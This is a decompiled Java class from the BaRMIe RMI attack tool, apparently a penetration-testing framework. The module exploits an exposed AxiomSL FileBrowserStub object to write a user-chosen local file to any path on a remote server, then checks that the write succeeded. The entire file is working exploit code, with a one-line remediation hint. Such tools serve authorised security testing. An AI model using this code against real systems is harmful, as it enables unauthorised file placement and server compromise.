/*
 * Decompiled with CFR 0.152.
 */
package nb.barmie.modes.attack.attacks.Axiom;

import axiomsl.server.rmi.FileBrowserStub;
import axiomsl.server.rmi.FileInformation;
import java.io.File;
import java.io.FileInputStream;
import nb.barmie.exceptions.BaRMIeAttackException;
import nb.barmie.exceptions.BaRMIeException;
import nb.barmie.exceptions.BaRMIeRemoteMethodCallException;
import nb.barmie.modes.attack.RMIAttack;
import nb.barmie.modes.enumeration.RMIEndpoint;

public class WriteFile
extends RMIAttack {
    public WriteFile() {
        this.setDescription("AxiomSL arbitrary file write");
        this.setDetailedDescription("AxiomSL exposes an object FileBrowserStub, which has a writeFile() method that writes the given data to the given path.");
        this.setRemediationAdvice("[AxiomSL] Update AxiomSL to the latest available version.");
    }

    @Override
    public boolean canAttackEndpoint(RMIEndpoint ep) {
        return ep.hasClass("axiomsl.server.rmi.FileBrowserStub");
    }

    @Override
    public void executeAttack(RMIEndpoint ep) throws BaRMIeException {
        byte[] contents;
        String srcFilename = this.promptUserForInput("Enter a local file to upload: ", false);
        String dstFilename = this.promptUserForInput("Enter a remote path to save the file to: ", false);
        System.out.println("");
        System.out.println("[~] Getting fileBrowser object...");
        FileBrowserStub fbs = (FileBrowserStub)this.getRemoteObject(ep, "fileBrowser");
        try {
            FileInputStream fis = new FileInputStream(srcFilename);
            contents = new byte[(int)new File(srcFilename).length()];
            fis.read(contents, 0, contents.length);
            fis.close();
        }
        catch (Exception ex) {
            throw new BaRMIeAttackException("Unable to read the given local file ('" + srcFilename + "').", ex);
        }
        try {
            System.out.println("[+] Retrieved, attempting to write remote file...");
            fbs.writeFile(dstFilename, contents);
            FileInformation fi = fbs.getFileInformation(dstFilename);
            if (fi.bExists) {
                System.out.println("[+] The file appears to have been written successfully.");
            } else {
                System.out.println("[-] Failed to write the file to the server.");
            }
        }
        catch (Exception re) {
            throw new BaRMIeRemoteMethodCallException("Failed to write the file to the server.", re);
        }
    }
}

